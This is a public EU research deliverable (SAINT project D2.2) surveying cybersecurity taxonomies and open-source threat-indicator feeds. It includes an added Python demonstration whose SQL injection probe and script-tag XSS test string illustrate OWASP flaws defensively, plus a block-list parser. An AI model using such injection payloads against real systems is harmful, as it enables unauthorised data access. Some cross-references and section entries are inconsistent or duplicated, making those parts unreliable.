D2.2 Final Report on Cybersecurity Indicators & Open Source Intelligence Methodologies

Work Package WP2: Metrics of Cybersecurity

Document Dissemination Level

P – Public: x
CO – Confidential, only for members of the Consortium (including the Commission Services):

Document Due Date: 28/02/2019

Document Submission Date: 28/02/2019

This work is performed within the SAINT Project – Systemic Analyser in Network Threats – with the support of the European Commission and the Horizon 2020 Program, under Grant Agreement No 740829


Document Information

Deliverable number: D2.2
Deliverable title: Final report on Cybersecurity Indicators & Open Source Intelligence Methodologies
Deliverable version: 1.0
Work Package number: WP2
Work Package title: Metrics of Cybersecurity
Due Date of delivery: 28/02/2019
Actual date of delivery:
Dissemination level: Public
Editor(s): Jart Armin (CYBE), Bryn Thompson (CYBE)
Contributor(s): Yannis Stamatiou (CTI), Edgardo Montes de Oca (MNTMG)
Reviewer(s): Olivia Odell (AS), Dimitris Kavallieros (KEMEA)
Ethical advisor(s): Christina Chalanouli (KEMEA)
Project name: Systemic Analyser in Network Threats
Project Acronym: SAINT
Project starting date: 1/5/2017
Project duration: 24 months
Rights: SAINT Consortium

Version History

Version | Date | Beneficiary | Description
0.1 | 21/12/2017 | CYBE CTI MI | First draft
0.2 | 28/01/2019 | CYBE CTI MI | 2nd Draft
0.3 | 15/02/2019 | CYBE CTI MI | 3rd Draft
0.4 | 19/02/2019 | CYBE | 4th Draft
0.5 | 21/02/2019 | CYBE | 5th draft for review
0.6 | 25/02/2019 | CYBE/AS/KEMEA | Final draft
1.0 | 27/02/2019 | CYBE | Final
1.1 | 04/03/2019 | CYBE | Add missing text on malware & Figure #

Copyright SAINT Consortium. All rights reserved. 2 D2.2 Final Report on Cybersecurity Indicators & Open Source Intelligence Methodologies

Table of Contents

1 Introduction ...... 8
2 Cyber Security Taxonomies and Ontology ...... 10
2.1 OAT ontology ...... 12
2.2 OWASP Top 10 – web application risks ...... 16
3 SAINT Selection of Cybersecurity Indicators – Phase 1 – (M1 to M6) ...... 18
3.1 ENISA’s Top 15 ...... 18
4 Final Open Source Cybersecurity Indicator Data Sets with WP2 and WP5 Phase 2 – (M3 – M9) ...... 20
5 Indicators - Econometrics ...... 28
5.1 Online population experienced cybercrime (EU) ...... 28
5.2 Time spent / lost per victim of cybercrime ...... 29
5.3 Cost of cybercrime (EU) ...... 29
5.4 Cost of a data breach ...... 30
5.5 Cost to individuals of cybersecurity measures ...... 30
5.6 Cost to enterprises of cybersecurity measures ...... 31
5.7 Cost to governments of cybersecurity measures ...... 32
5.8 Number of individuals working in cybersecurity (2018 EU) ...... 32
5.9 Estimates for cybersecurity personnel needed (by 2020 EU) ...... 33
6 Indicators - Cybercrime Activity ...... 34
6.1 Malware ...... 34
6.1.1 Trojans ...... 36
6.1.2 Viruses (computer) ...... 36
6.1.3 Worms ...... 36
6.2 Web based attacks ...... 36
6.2.1 RFI (remote file inclusion) ...... 36
6.2.2 LFI (local file inclusion) ...... 37
6.2.3 XSA (cross server attack) ...... 37
6.2.4 RCE (remote code execution) ...... 37
6.3 Web application attacks ...... 37
6.4 Denial of Service (DoS, DDoS, DrDoS) ...... 38
6.5 Botnets ...... 41
6.6 Phishing ...... 42
6.7 Ransomware ...... 43
6.8 Exploit kits ...... 44
6.8.1 Crimeware ...... 46
6.8.2 Cybercrime as a service ...... 46
6.9 APT (Advanced Persistent Threats) ...... 46


6.10 Data breaches ...... 48
6.11 Cyber attacks ...... 49
6.12 Identity theft ...... 50
6.13 Cyber espionage ...... 50
6.13.1 RATs (Remote Access Trojan) ...... 51
6.13.2 Cyberterrorism ...... 52
6.13.3 Cyberwarfare ...... 52
6.14 Intrusion (computer) ...... 52
6.14.1 Spyware ...... 53
6.14.2 Malvertising ...... 53
6.14.3 Clickjacking ...... 53
6.14.4 Grayware ...... 53
6.14.5 Backdoors ...... 54
6.14.6 Adware ...... 54
6.15 Cryptovirology ...... 54
6.16 Malicious software (badware) ...... 55
6.16.1 Rootkits ...... 56
6.16.2 Bootkits ...... 56
6.16.3 Keyloggers ...... 57
6.16.4 Software used for illegal purposes ...... 57
6.17 DNS tunnelling ...... 57
6.18 Domain abuse ...... 58
7 Indicators - Emerging Threats (Examples) ...... 60
7.1 Cryptojacking ...... 60
7.2 Stegomalware (Stegware) ...... 61
7.3 Fileless malware attacks ...... 62
7.4 Automated threats ...... 62
7.5 OAT ontology ...... 63
7.6 Bad bots ...... 64
8 Indicators - Abusive content ...... 65
8.1 Spam (deceptive communications) ...... 67
8.2 Harmful speech ...... 68
8.3 Child/Sexual/Violence/... (child sexual abuse) ...... 68
8.4 Cyberbullying ...... 69
8.5 Fake news (deceptive content) ...... 70
9 Blacklists, Blocklists and Whitelists - Open Source Methodologies ...... 72
10 Indicators - Insecurity ...... 74
10.1 DNS - Misconfigured open resolvers (DDos & DrDos) ...... 74

10.2 BGP – Hijacking, outages, leaks ...... 75
10.3 Insider threat (malicious and accidental) ...... 76
10.4 Physical manipulation / damage / theft / loss ...... 77
10.5 Information leakage ...... 79
10.6 Vulnerabilities ...... 79
10.7 False positives ...... 80
11 IOCs Indicators of Compromise ...... 81
11.1 Insider threat ...... 81
11.2 Unusual outbound network traffic (egress) ...... 82
11.3 Anomalies in privileged user account activity ...... 82
11.4 Geographical irregularities ...... 83
11.5 Log-in red flags ...... 83
11.6 Increases in database read volume ...... 83
11.7 HTML response sizes ...... 83
11.8 Large numbers of requests for the same file ...... 84
11.9 Mismatched port-application traffic ...... 84
11.10 Suspicious registry or system file changes ...... 85
11.11 Unusual DNS requests ...... 85
11.12 Unexpected patching of systems ...... 86
11.13 Mobile device profile changes ...... 86
11.14 Bundles of data in the wrong place ...... 86
11.15 Web traffic with unhuman behaviour ...... 86
11.16 Signs of DDoS activity ...... 87
12 Indicators - Security ...... 88
12.1 Antivirus ...... 88
12.2 Security Information and Event Management (SIEM) ...... 88
12.3 Managed Security Services (MSS) ...... 90
12.4 Security Operations Centre (SOC) ...... 91
12.5 The Cyber Kill Chain ...... 92
12.6 Authentication ...... 93
12.6.1 Multi-factor authentication ...... 94
12.6.2 Authorization ...... 94
12.7 Digital epidemiology (evidence-based practice) ...... 94
12.8 Data-centric security ...... 96
12.9 Data encryption ...... 96
12.10 Firewall ...... 97
12.11 GDPR (General Data Protection Regulation) ...... 98
12.12 Intrusion detection system (IDS) ...... 99

12.12.1 Intrusion prevention system ...... 100
13 Interoperable ICT Solutions – Open Source ...... 101
13.1 OASIS - STIX, TAXII, CYBOX ...... 102
13.2 MISP ...... 102
13.3 YARA ...... 103
14 Conclusions and Recommendations ...... 104
14.1 Conclusions ...... 104
14.2 Recommendations ...... 105
15 Annex A - Current List of all Open Source RBLs (Blacklists / Blocklists) - Alive – Feb 19 ...... 107
16 Annex B - List of all RBLs (Open Source Blacklists / Blocklists) – Currently Inactive – Feb 2019 ...... 128
17 Annex C Threat Taxonomy Comparisons ...... 157


Table of Figures

Figure 1.1: The SAINT cybersecurity indicators ...... 9
Figure 2.1: Reference & Common Taxonomy – CSIRTs, LEAs, ENISA, and EC3 ...... 11
Figure 2.2: OAT Ontology – Relating to CAPEC Threat taxonomy ...... 14
Figure 2.3: OAT Ontology – Relating to WASC Threat taxonomy ...... 15
Figure 4.1: Screenshot SAINT Global Security Map – globalsecuritymap.com/saint ...... 25
Figure 4.2: Screenshot SAINT Global Security Map - sample country detail (Germany) – globalsecuritymap.com/saint ...... 26
Figure 4.3: Screenshot SAINT Global Security Map - sample country detail (Finland) – globalsecuritymap.com/saint ...... 27
Figure 6.1: Peak sizes of DDoS 2007 - 03/2018 - Arbor Networks ...... 39
Figure 6.2: Top 10 phishing email subjects for 4th quarter 2018 ...... 43
Figure 6.3: Lifecycle of Advanced Persistent Threats (APT) ...... 47
Figure 6.4: Most abused GTLDs – Jan 2019 ...... 59
Figure 8.1: Government required content restrictions - Top 10 countries - Facebook, Instagram, Messenger, Oculus and WhatsApp - Jan to Jun 2018 ...... 66
Figure 8.2: Government required social media accounts (access locked and awaiting formal governmental paperwork to follow the initial request) ...... 66
Figure 8.3: Top 10 countries - Facebook, Instagram, Messenger, Oculus and WhatsApp - Jan to Jun 2018 (government requests for access to social media accounts) ...... 67
Figure 10.1: Location of Memcached protocol servers (Arbor Networks) ...... 75
Figure 10.2: Memcached amplification attacks recorded 30 days (DDoSMon) ...... 75
Figure 12.1: The SAINT Triad of Evidence-Based Practices for Digital Epidemiology ...... 95
Figure 13.1: ENISA CTI Modules ...... 102

Table of Tables

Table 1-1: Layout of the SAINT Indicator Analysis (Taxonomy) ...... 9
Table 2-1: OWASP – OAT Ontology ...... 13
Table 2-2: OWASP Top 10 Web Application Attacks ...... 16
Table 3-1: ENISA - Top Threats published 2017/2018 ...... 19
Table 3-2: ENISA – Top Threats published 2018/2019 ...... 19
Table 4-1: SAINT Final open source threat indicators ...... 20


1 Introduction

The objective of WP2 is to set out a framework of methodologies for the development of an ongoing and searchable public database of cybersecurity indicators and open source intelligence methodologies. It features experimental economics, along with cost-benefit analysis of cooperative and regulatory approaches. Areas to be explored and developed within WP2: analysis of the state-of-the-art in active sources of cyber-threat information; comparative analysis of cybercrime victims within a framework of qualitative social science methodologies; and the role of effective industry standards, benchmarking and regulatory approaches as a cost-benefit factor in cyber-crime reduction.

This deliverable combines findings from the initial report on the state-of-the-art in active sources of cyber-threat activity, including blacklists, cyber-attack measurements, malware listing, infected websites and phishing activity, with additional updates and analysis researched for the final report. For D2.1, three distinct research phases were outlined: Phase 1 – Selection of Cybersecurity Indicators (M1 to M6); Phase 2 – Refine Open Source cybersecurity indicator data sets and interaction with WP5 to build data sets (M3 – M9); and Phase 3 – Report on cyber-security indicators and open source intelligence methodologies (M12).

● Phase 1 - What is a cybersecurity indicator? - A cybersecurity indicator is information with which one can identify malicious reconnaissance, the method of attack, the incident itself or its impact(s).
● Phase 2 - What is a cyber threat? - An unwanted action, on or against an information system and/or its data, with a malicious or harmful intention.
● Phase 3 – The D2.1 report defines a taxonomy for the identified cybersecurity indicators. The taxonomy was ratified by SAINT as its own standard classification for the remainder of the project.
For D2.2, Phases 1 – 3 were developed further with additional innovative research on cybersecurity indicators and an extension of the taxonomy. In D2.1 we set out to define what a cybersecurity indicator is, with the definition outlined above. In D2.2, cybersecurity indicators are defined within the context of important aids to quantifying threats in the cyber-domain and their evolution over time (threats increase/decrease/stagnate). Indicators help make comparisons across different threats (e.g., an increase in the frequency of botnets, stagnation of malware over the past two years, etc.). Measurement of indicators of compromise (IOCs) and cyber-security related incidents provides a wealth of information and quantifiable metrics for interpretation in a variety of ways, whether for enterprises, industry or the economy. Indicators are an essential component of threat intelligence processes. There are therefore numerous indicators from which to choose, relevant to specific needs. For the purposes of the SAINT research, we aimed to simplify the selected SAINT indicators into an illustrative form as depicted in Figure 1.1 below. The number of available indicators within each sub-set is also included in the diagram.


Figure 1.1: The SAINT cybersecurity indicators

Each indicator is explained individually within the SAINT taxonomy and, most importantly, examples of relevant metrics are given where these are available. The chosen format of the SAINT taxonomy is presented using the template shown in Table 1-1.

Table 1-1 Layout of the SAINT Indicator Analysis (Taxonomy)

Nomenclature: A SAINT system of names or terms, as those used in open source cybersecurity, to accurately define the indicator. N.B. part of the problem within existing cybersecurity metrics and econometric analysis is that, within many publications, nomenclature is often ill defined, uncommon and self-devised.

Examples: Where possible, examples of the indicator are given.

Usage: Where possible, examples of the recently reported usage of the indicator are given.

Metrics: Where possible, publicly reported (open source), publicly available recent examples of the metrics (threat statistics / quantification) for an indicator are given, with added econometric analysis.


2 Cyber Security Taxonomies and Ontology

Cyber security taxonomies have developed out of the need to classify, organise and understand the scientific concepts in a relatively new field of technology. In broad terms, classification is carried out by the following means:

• Taxonomy is the practice and science of classification of things or concepts, including the principles that underlie such classification.
• Ontology is a set of concepts and categories in a subject area or domain that shows their properties and the relations between them.

There is a wealth of valuable previous research on cyber security taxonomies, although this has not been translated with the same relevance to metrics. The aim of the SAINT taxonomy is to bring these two areas together.

Note: The nomenclatures utilised below within the SAINT cybersecurity indicators draw upon the taxonomies from ENISA [1], CyberROAD (a research project funded by the European Commission under the Seventh Framework Programme) [2], CAPEC (Common Attack Pattern Enumeration and Classification) by MITRE [3], and WASC (Web Application Security Consortium) [4], in generally accepted common usage. The following Figure 2.1 shows the taxonomy that resulted from collaboration initiatives such as the annual ENISA/EC3 Workshop, which involved CSIRTs, LEAs, ENISA, and EC3 [5].

[1] Threat Taxonomy ENISA, latest version updated in September 2016 - https://www.enisa.europa.eu/topics/threat-risk-management/threats-and-trends/enisa-threat-landscape/threat-taxonomy/view
[2] CyberROAD - https://www.cyberroad-project.eu/en/
[3] CAPEC – MITRE - Common Attack Pattern Enumeration and Classification - https://capec.mitre.org/data/index.html
[4] WASC - Web Application Security Consortium - http://projects.webappsec.org/w/page/13246978/Threat%20Classification
[5] CSIRTs, LEAs, ENISA, and EC3 Taxonomy – Jan 2018 - https://www.enisa.europa.eu/publications/reference-incident-classification-taxonomy

Figure 2.1: Reference & Common Taxonomy – CSIRTs, LEAs, ENISA, and EC3

The Common Attack Pattern Enumeration and Classification (CAPEC) effort provides a publicly available catalogue of taxonomies for common attack patterns that helps users understand how adversaries exploit weaknesses in applications and other cyber-enabled capabilities. "Attack Patterns" are descriptions of the common attributes and approaches employed by adversaries to exploit known weaknesses in cyber-enabled capabilities. Attack patterns define the challenges that an adversary may face and how they go about solving them. They derive from the concept of design patterns applied in a destructive rather than constructive context and are generated from in-depth analysis of specific real-world exploit examples. Each attack pattern captures knowledge about how specific parts of an attack are designed and executed, and gives guidance on ways to mitigate the attack's effectiveness. Attack patterns help those developing applications, or administering cyber-enabled capabilities, to better understand the specific elements of an attack and how to stop them from succeeding.


Understanding how the adversary operates is essential to effective cyber security. CAPEC™ helps by providing a comprehensive dictionary of known patterns of attack employed by adversaries to exploit known weaknesses in cyber-enabled capabilities. It can be used by analysts, developers, testers, and educators to advance community understanding and enhance defences. MITRE describes the benefits as follows: attack patterns captured in such a formalized way can bring considerable value to the development and maintenance of cyber-enabled capabilities, including:

• Training – Educate software developers, testers, buyers, and managers.
• Requirements – Define potential threats.
• Design – Provide context for architectural risk analysis.
• Implementation – Prioritize review activities.
• Verification – Guide appropriate penetration testing.
• Release – Understand trends and attacks to monitor.
• Response – Leverage lessons learned into preventative guidance.

Threat Taxonomy Comparisons are shown in ANNEX D.

2.1 OAT ontology

OWASP produced the OAT (OWASP Automated Threats) ontology to provide a common language for developers, architects, operators, business owners, security engineers, purchasers and suppliers/vendors, to facilitate clear, common communications and threat exchange for automated threats to web applications [6].

[6] OWASP – OAT Ontology - OWASP Automated Threat Handbook Web Applications - https://www.owasp.org/images/3/33/Automated-threat-handbook.pdf

Table 2-1: OWASP – OAT Ontology

The two figures below show the relationship between the OAT Ontology and the CAPEC and WASC taxonomies.


Figure 2.2: OAT Ontology – Relating to CAPEC Threat taxonomy


Figure 2.3: OAT Ontology – Relating to WASC Threat taxonomy


2.2 OWASP Top 10 – web application risks

OWASP (Open Web Application Security Project) Top 10 - 2017, The Ten Most Critical Web Application Security Risks [7], is displayed in Table 2-2 below:

Table 2-2: OWASP Top 10 Web Application Attacks

The OWASP Top 10 - 2017 is based primarily on 40+ data submissions from firms that specialize in application security and an industry survey that was completed by over 500 individuals. This data spans vulnerabilities gathered from hundreds of organizations and over 100,000 real-world applications and APIs. The Top 10 items are selected and prioritized according to this prevalence data, in combination with consensus estimates of exploitability, detectability and impact.

Website Injection
Injection flaws, such as SQL, NoSQL, OS, and LDAP injection, occur when untrusted data is sent to an interpreter as part of a command or query. The attacker’s hostile data can trick the interpreter into executing unintended commands or accessing data without proper authorization.

Web Broken Authentication & Session Management
Application functions related to authentication and session management are often implemented incorrectly. This allows attackers to compromise passwords, keys, or session tokens, or to exploit other implementation flaws that allow temporarily or permanently taking control of a user’s identity.

XSS (cross site scripting)
XSS flaws occur whenever an application includes untrusted data in a new web page without proper validation or escaping, or updates an existing web page with user-supplied data using a browser API that can create HTML or JavaScript. XSS allows attackers to execute scripts in the victim’s browser, which can hijack user sessions, deface web sites, or redirect the user to malicious sites.

Broken Access Control
Restrictions on what authenticated users are allowed to do are often not properly enforced. Attackers can exploit these flaws to access unauthorized functionality and/or data, such as accessing other users' accounts, viewing sensitive files, modifying other users’ data, changing access rights, etc.

Security Misconfiguration
Security misconfiguration is the most commonly seen issue. This is commonly a result of insecure default configurations, incomplete or ad hoc configurations, open cloud storage, misconfigured HTTP headers, and verbose error messages containing sensitive information. Not only must all operating systems, frameworks, libraries, and applications be securely configured, but they must be patched and upgraded in a timely fashion.

Sensitive Data Exposure
Many web applications and APIs do not properly protect sensitive data, such as financial, healthcare, and PII. Attackers may steal or modify such weakly protected data to conduct credit card fraud, identity theft or other crimes. Sensitive data may be compromised without extra protection, such as encryption at rest or in transit, and requires special precautions when exchanged with the browser.

Insufficient Attack Protection
Insufficient logging and monitoring, coupled with missing or ineffective integration with incident response, allows attackers to further attack systems, maintain persistence, pivot to more systems, and tamper with, extract, or destroy data. Most breach studies show the time to detect a breach is over 200 days, typically detected by external parties rather than internal processes or monitoring.

Website Components with Known Vulnerabilities
Components, such as libraries, frameworks, and other software modules, run with the same privileges as the application. If a vulnerable component is exploited, such an attack can facilitate serious data loss or server takeover. Applications and APIs using components with known vulnerabilities may undermine application defences and enable various attacks and impacts.

Unprotected APIs (application programming interface)
Many older or poorly configured XML processors evaluate external entity references within XML documents. External entities can be used to disclose internal files using the file URI (Uniform Resource Identifier) handler, internal file shares, internal port scanning, remote code execution and denial of service attacks.

[7] OWASP Top 10 2017 - https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project ; OWASP Top 10 2017 - https://www.owasp.org/images/7/72/OWASP_Top_10-2017_%28en%29.pdf.pdf
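To make the Injection and XSS items concrete, the following Python snippet is an added example (not from this report, from OWASP, or from the SAINT project) that puts a string-concatenated SQL lookup beside its parameterised form, and adds an HTML output function that escapes user-supplied text before it reaches the browser. The in-memory `users` table, its rows and the function names are constructed for the illustration.

```python
import html
import sqlite3


def make_db():
    """Build a constructed sample database (not real data) with two users."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, email TEXT)")
    conn.executemany(
        "INSERT INTO users (name, email) VALUES (?, ?)",
        [("alice", "alice@example.org"), ("bob", "bob@example.org")],
    )
    return conn


def lookup_vulnerable(conn, name):
    """The Injection flaw: untrusted input is pasted into the query text, so the
    SQL interpreter cannot tell where the data ends and the syntax begins."""
    query = "SELECT name FROM users WHERE name = '" + name + "'"
    return [row[0] for row in conn.execute(query)]


def lookup_parameterised(conn, name):
    """The fix: the query text is fixed and the value is bound as a parameter,
    so whatever the input contains it is only ever compared as a string."""
    query = "SELECT name FROM users WHERE name = ?"
    return [row[0] for row in conn.execute(query, (name,))]


def render_greeting(name):
    """The XSS mitigation: escape untrusted text before inserting it into HTML,
    so markup in the input is shown as text rather than interpreted."""
    return "<p>Hello, " + html.escape(name, quote=True) + "</p>"


if __name__ == "__main__":
    db = make_db()
    # A textbook test string: it closes the quoted literal and appends an
    # always-true condition, which the concatenated query accepts as SQL.
    probe = "x' OR '1'='1"
    print("concatenated query returns:", lookup_vulnerable(db, probe))
    print("parameterised query returns:", lookup_parameterised(db, probe))
    print(render_greeting("<script>alert(1)</script>"))
```

The parameterised form is the only one of the two in which the result set depends solely on the value of `name`; the same principle (keep code and data in separate channels, encode at the output boundary) applies to the NoSQL, OS and LDAP variants the item lists.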


3 SAINT Selection of Cybersecurity Indicators – Phase 1 – (M1 to M6)

3.1 ENISA’s Top 15

The role of the European Union Agency for Network and Information Security (ENISA) has expanded and developed since it began in 2004 [8]. ENISA provides recommendations on cybersecurity, supports policy development and its implementation, and collaborates with operational teams throughout Europe. The objective of ENISA is to improve network and information security in the European Union. ENISA’s role has continued to expand in recent years. A political agreement to establish a permanent mandate in the Cybersecurity Act was reached on 10 December 2018 by the European Parliament, the Council of the European Union, and the European Commission. ENISA is now known as ‘the EU Agency for Cybersecurity’ [9]. The agreement reinforces the mandate of the agency, to better support the EU Member States in dealing with cybersecurity threats and attacks. The main highlights of the Cybersecurity Act:

• ENISA will receive a permanent mandate with more human and financial resources;
• ENISA will increase its support to EU Member States, in order to improve capabilities and expertise, notably in the areas of cyber crisis coordination and the prevention of and response to cyber-incidents;
• Within the Cybersecurity Certification Framework, ENISA will have market-related tasks, notably by preparing European cybersecurity certification schemes with the expert assistance and close cooperation of national certification authorities and industry;
• ENISA will strengthen its support to Member States and the EU institutions in the development, implementation and review of general cybersecurity policy.

Annually, since 2012, ENISA has published the Top 15 Threats and the widely recognised Threat Taxonomy (ETT - 2016) [10][11] that organizations and individuals have been exposed to - see Table 3.1. Therefore, for the selection of core cybersecurity indicators, SAINT has focused on ENISA’s Top 15 threats. Other indicators are introduced during Phase 2 below. Table 3.1 also indicates the current trends in the occurrence of these threats in 2016 and 2017.

[8] https://www.enisa.europa.eu/
[9] https://www.enisa.europa.eu/news/enisa-news/eu-leaders-agree-on-ground-breaking-regulation-for-cybersecurity-agency-enisa
[10] ENISA Threat landscape - https://www.enisa.europa.eu/topics/threat-risk-management/threats-and-trends/enisa-threat-landscape
[11] Evaluation of Comprehensive Taxonomies for Information Technology Threats - SANS Mar 2018 - https://www.sans.org/reading-room/whitepapers/threatintelligence/evaluation-comprehensive-taxonomies-information-technology-threats-38360

Table 3-1: ENISA - Top Threats published 2017/2018

Table 3-2: ENISA – Top Threats published 2018/2019


4 Final Open Source Cybersecurity Indicator Data Sets with WP2 and WP5 Phase 2 – (M3 – M9)

For Phase 2 of D2.1 – Refine Open Source cybersecurity indicator data sets and interaction between WP2 and WP5 to build data sets (M3 – M9) – the following Table 4-1 lists the final threat indicators in order of importance.

Table 4-1: SAINT Final open source threat indicators

Note: Items 1-9 in Table 4-1 will be within the open source data feed in the short term to SAINT’s GSM (Global Security Map) and are described below in 4.1 to 4.13. Items 10-19 in Table 4-1 are desirable additions to the open source data feed to SAINT’s GSM later (beyond the project lifetime).

The following Sections 4.1 to 4.13 summarize the progress, current state and briefing information about each threat indicator examined, analysed and implemented by SAINT. It should be noted that the data of all these indicators are open source. As of the publication of this deliverable, 12 indicators (as detailed in the list 4.1 to 4.12 below) have been output to a SAINT version of the Global Security Map tool provided by CYBE for SAINT (see Figure 4.1 below). These indicators will be used to display frequent updates of each indicator on a global map view and will also take into account the results of the surveys in D2.3. In the publication of D2.2, the SAINT indicators are documented, and the website will be made live before the end of the project.

4.1 Threat Indicator 1 -
• Type: Malware (domains)
• About: ENISA Top 15 Threats
• Information: This is a Malware indicator reporting a variety of malicious web pages across the internet. This indicator does not focus on a specific category of intrusive or harmful software; rather, it covers a wide spectrum of cyber threats including Trojans, phishing, malware or even suspicious software. The interesting part about this indicator is that it constitutes a mirror for other open source malware lists.


4.2 Threat Indicator 2 – Blocklist-all
• Type: Web Based Attacks
• About: ENISA Top 15 Threats
• Information: The indicator represents a blocked IPs list, meaning a list of all the IPs from which cyberattacks are launched.

4.3 Threat Indicator 3 – Dshield-block

• Type: Web Based Attacks
• About: ENISA Top 15 Threats
• Information: This indicator is a list that summarizes the top 20 attacking class C (/24) subnets over the last three days. The number of 'attacks' indicates the number of targets reporting scans from this subnet.

4.4 Threat Indicator 4 – Phishing Attacks
• Type: Phishing
• About: ENISA Top 15 Threats
• Feed: https://www.phishtank.com/
• Information: The term phishing describes all malicious software disguised as trustworthy during an electronic communication, luring users as bait in an attempt to convince them to share sensitive personal information such as usernames, passwords and credit card details. This indicator provides information about attacks that fall into the phishing category. As an indicator it provides a large number of phishing-related events, i.e. it lists all malicious IPs which launch deceiving software with the intent to collect personal and sensitive information.

4.5 Threat Indicator 5 – DDoS
• Type: DDoS
• About: ENISA Top 15 Threats
• Information: DDoS refers to distributed denial of service and suggests a cyber-attack where the perpetrator tries to make a machine, service or network unavailable. To achieve this, the perpetrator usually floods the targeted machine with a very large number of requests at a fast rate until the machine is overloaded and unable to provide any service to clients. In this spirit, Exploit Database is a CVE (Common Vulnerabilities and Exposures) compatible database maintained by Offensive Security, that provides users with usually sensitive information made publicly available on the Internet.

4.6 Threat Indicator 6 – Botnets C&Cs
• Type: Botnets
• About: ENISA Top 15 Threats
• Information: This indicator belongs to the botnets category. This term describes a set of usually interconnected devices across the internet that run automated scripts and aim to fulfil a task in a distributed fashion, e.g. a DDoS attack. Usually such a distributed system of bots is controlled by its owner using a command and control (C&C) system. The term botnet derives from the words bot and net, short for robot and network respectively. Bot best describes the devices that were compromised, meaning the devices which were penetrated by malicious software, whose security was breached, and over which control was taken.
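The Dshield-block feed in 4.3 above is a tab-separated text file whose comment header documents the columns. The following Python consumer is an added example, not code from this report, from DShield or from SAINT's GSM: it parses such a list, ranks the listed /24 subnets by the 'attacks' count, answers whether a given address falls inside one of them, and renders the entries as firewall rules. The column order (start, end, netmask, attacks, network name, country, contact email) is assumed from the feed's published header; the sample rows are constructed from RFC 5737 documentation ranges, and the rules are returned as strings rather than applied.

```python
import ipaddress
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample in the assumed DShield block-list layout (tab separated,
# '#' lines are comments). The subnets are RFC 5737 documentation ranges,
# not real attacking networks; names and counts are made up.
SAMPLE_FEED = (
    "# DShield.org Recommended Block List (constructed sample)\n"
    "# Start\tEnd\tNetmask\tAttacks\tName\tCountry\temail\n"
    "192.0.2.0\t192.0.2.255\t24\t1575\tEXAMPLE-NET-A\tZZ\tabuse@example-a.invalid\n"
    "198.51.100.0\t198.51.100.255\t24\t820\tEXAMPLE-NET-B\tZZ\tabuse@example-b.invalid\n"
    "203.0.113.0\t203.0.113.255\t24\t97\tEXAMPLE-NET-C\tZZ\t\n"
    "not\ta\tvalid\trow\n"
)


@dataclass
class BlockEntry:
    network: ipaddress.IPv4Network
    attacks: int  # number of targets that reported scans from this subnet
    name: str
    country: str


def parse_block_list(text: str) -> List[BlockEntry]:
    """Parse the tab-separated feed into entries, skipping comments and rows
    that do not have the expected shape rather than guessing at them."""
    entries: List[BlockEntry] = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split("\t")
        if len(fields) < 6:
            continue  # malformed row
        start, _end, netmask, attacks, name, country = fields[:6]
        try:
            network = ipaddress.ip_network(f"{start}/{netmask}", strict=False)
            count = int(attacks)
        except ValueError:
            continue  # unparsable address or count
        entries.append(BlockEntry(network, count, name.strip(), country.strip()))
    return entries


def top_attackers(entries: List[BlockEntry], n: int = 20, min_attacks: int = 0) -> List[BlockEntry]:
    """Rank by the 'attacks' column; min_attacks drops low-count subnets that
    are most likely to produce false positives if blocked outright."""
    ranked = sorted(entries, key=lambda e: e.attacks, reverse=True)
    return [e for e in ranked if e.attacks >= min_attacks][:n]


def match_ip(entries: List[BlockEntry], ip: str) -> Optional[BlockEntry]:
    """Return the listed subnet containing ip, or None if it is not listed."""
    addr = ipaddress.ip_address(ip)
    for entry in entries:
        if addr in entry.network:
            return entry
    return None


def to_iptables_rules(entries: List[BlockEntry]) -> List[str]:
    """Render entries as iptables DROP rules (strings only; nothing is applied)."""
    return [f"iptables -A INPUT -s {e.network} -j DROP" for e in entries]


if __name__ == "__main__":
    feed = parse_block_list(SAMPLE_FEED)
    for entry in top_attackers(feed, min_attacks=100):
        print(f"{entry.network}  attacks={entry.attacks}  {entry.name} ({entry.country})")
    hit = match_ip(feed, "198.51.100.77")
    print("198.51.100.77 ->", hit.name if hit else "not listed")
    print("\n".join(to_iptables_rules(top_attackers(feed, min_attacks=100))))
```

Because the feed is a rolling three-day top-20, any rules derived from it should be regenerated on each fetch and the previous set withdrawn, otherwise the block list silently grows past what the source currently reports.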


4.7 Threat Indicator 7 – Botnets IPs
• Type: Botnets
• About: ENISA Top 15 Threats
• Information: This indicator provides information about bot-related activity. Its source tracks the automated web scripts ("bots") that register on forums, pollute databases, spread spam and abuse web forms, recording the names, IPs and e-mail addresses the bots use as unique signatures for future reference, so that site operators can block them.

4.8 Threat Indicator 8 – Ransomware blocklist
• Type: Ransomware
• About: ENISA Top 15 Threats (2nd Priority)
• Information: Ransomware is malicious software that threatens to publish the victim's data, or to block access to it permanently, unless a ransom is paid. Some ransomware can be reversed by a knowledgeable user; more advanced families use crypto-viral extortion, encrypting the victim's files so that they cannot be recovered without the attacker's key. This Ransomware Tracker indicator offers several blocklists for blocking ransomware botnet C&C traffic. The available blocklists are documented and updated at 5-minute intervals.

4.9 Market Indicator 9 – Bug Bounties
• Type: Bug-Bounties
• About: ENISA Top 15 Cybersecurity Markets
• Information: This is a hacker-powered (bug bounty) security platform whose goal is to help organizations find and fix critical vulnerabilities before they are criminally exploited; large companies use it to test and secure the applications their business depends on. As a bounty platform it publishes pages with the prices paid and the hacker activity involved in resolving bugs. This is valuable for monitoring the fluctuation of bug bounty prices across platforms and software applications.
4.10 Threat Indicator 10 – SPAM
• Type: Spam
• About: ENISA Top 15 Threats (2nd Priority)
• Information: Spam is the use of electronic messaging systems to send unsolicited bulk messages ("spams"), most commonly advertising. This indicator is also drawn from the clean-mx domain, so the same considerations apply as for the clean-mx phishing and malware indicators.

4.11 Threat Indicator 11 – Ransomware blocklist
• Type: Ransomware
• About: ENISA Top 15 Threats (2nd Priority)
• Information: As for 4.8: ransomware threatens to publish the victim's data or to block access to it permanently unless a ransom is paid, in its advanced forms by encrypting the victim's files (crypto-viral extortion). This Ransomware Tracker indicator offers several blocklists for blocking ransomware botnet C&C traffic; the available blocklists are documented and updated at 5-minute intervals.

4.12 Cybersecurity Social Network Analyzer (CSNA)
